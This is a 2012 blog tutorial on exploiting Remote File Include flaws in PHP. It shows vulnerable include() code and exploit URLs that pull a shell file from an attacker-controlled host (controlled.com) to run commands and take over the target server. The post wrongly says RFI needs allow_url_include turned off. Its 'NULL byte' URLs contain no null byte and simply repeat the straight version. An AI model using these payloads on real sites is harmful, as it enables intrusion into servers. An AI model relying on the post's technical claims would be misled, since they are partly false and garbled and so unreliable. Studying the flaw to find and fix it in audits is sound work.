Tuesday, May 15, 2012

Remote File Include (RFI) Exploitation

Remote File Includes (a.k.a. RFI) work in the same way Local Fiel Includes (LFI) work with the main difference being instead of including local pages we will actually try to include remote pages from a different site and domain. The flaw is the same as LFI vulns but requires not only allow_url_fopen to be ON but also requires allow_url_include to be OFF.

LFI: allow_url_fopen = On
RFI: allow_url_include = Off

When these conditions are right we can perform a Remote File Inclusion with disastewrous affects on the target site, just as you have seen in past with LFI. We can include PHP code from remote site and use it to perform command execution on the target site and ultimately leverage it to perform a full system comprimise.

RFI technique can be used with straight inclusions:
  <?php
  $page = $_GET['page'];
  include($page);
  ?>

As well as with NULL byte inclusions where we need to kill a appended file extension or similar:
  <?php
  $page = $_GET['page'];
  include($page . ".php");
  ?>
Now in order to properly get our code injected or included we need to keep it stored on a site we contorl and we need to keep it in text format as opposed to standard PHP file format (i.e. shell.txt instead of shell.php). We replace the vuln link in our target site with a reference to a our remote controled site (http://controlled.com/shell.txt). I should note that we add a "?" to the end of our request link which will tell the target vuln server to interpret what follows as executable code. Our final exploit request link looks like this:

Straight Include:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

OR to kill appendage you might try NULL byte:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?;
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

Depending on which technique you use you should find (if vuln) that your remote code is now being included on the target page. The above code examples would now be returning the "$page" variable as so:

Straight Include: include('http://controlled.com/shell.txt');
OR
NULL Byte Include: include('http://controlled.com/shell.txt?/.php');

This results in our code now being included placing our remote code actively on the immediate page. If you can't execute code you wont be able to do much other than including Google which is still vuln but you need to include a full featured shell or place custom code on your remote controlled host to comprimise things and make permanent impact on the target server.

Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:

video

Hope you enjoyed the show....

Until next time, Enjoy!

No comments:

Post a Comment